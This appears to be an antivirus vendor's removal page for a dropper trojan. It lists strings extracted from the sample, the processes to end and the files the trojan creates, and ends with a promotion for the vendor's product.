CSocketMaster.ProcessOptions

CSocketMaster.GetData

CSocketMaster.PeekData

CSocketMaster.RecvData

CSocketMaster.Listen

CSocketMaster.Accept

modSocketMaster.InitiateProcesses

modSocketMaster.FinalizeProcesses

Address family not supported by protocol family.

Operation already in progress.

Operation now in progress.

Socket operation on nonsocket.

Operation not supported.

Protocol family not supported.

Protocol not supported.

Socket type not supported.

Winsock.dll version out of range.

modSocketMaster.DestroyWinsockMessageWindow

modSocketMaster.RegisterSocket

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

regsvr32.exe:1760
regsvr32.exe:2020
regsvr32.exe:1412
sc.exe:1164
sc.exe:896
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepro[1].txt (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (11299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (11385 bytes)
%WinDir%\system\lock.dat (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\exitpop[1].txt (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\insert.tmp (2490 bytes)
%WinDir%\win.ini (4626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\newDomain[1].txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBIC753.TMP (17716 bytes)
%WinDir%\lock.log (914 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DFA2796.tmp (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\InsertWnd[1].txt (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\InsertWnd_enlc[1].dll (19378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\safeen[1].txt (670 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\pubjc[1].txt (21084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA90A3.TMP (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\osm[1].dll (11953 bytes)
%Documents and Settings%\%current user%\Application Data\8901.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\newcor[1].dll (34450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\yxjpq[1].txt (588 bytes)
%System%\lockie.ini (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA3334.tmp (3383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (8314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (692 bytes)
%System%\mswinsck.ocx (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xsend.tmp (37241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (6262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (58 bytes)
%WinDir%\sys.dat (7212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\jzjc[1].txt (154 bytes)
%System%\gdi30.dll (112 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jslist[1].txt (1405 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\file[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA8273.tmp (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (4418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ic[1].htm (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (154 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jzurl[1].txt (1224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (294 bytes)
%System%\drivers\etc\hosts.tmp (2822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\tfgg[1].txt (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\icdata[1].dll (18063 bytes)
%WinDir%\xdrq\lockie.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\eb[1].txt (1721 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (19996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\InsertWnd_2345title_en[1].dll (16223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (1006 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DUs6109.tmp (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\serList[1].txt (1521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\prosafe[1].txt (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA6871.tmp (11948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\urlRemote[1].txt (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (388 bytes)
%WinDir%\Media\ad.ini (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC263.TMP (16428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (1824 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Trojan.Heur.Dropper.hmGfamxW9Ncb_01a6ec54d2

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet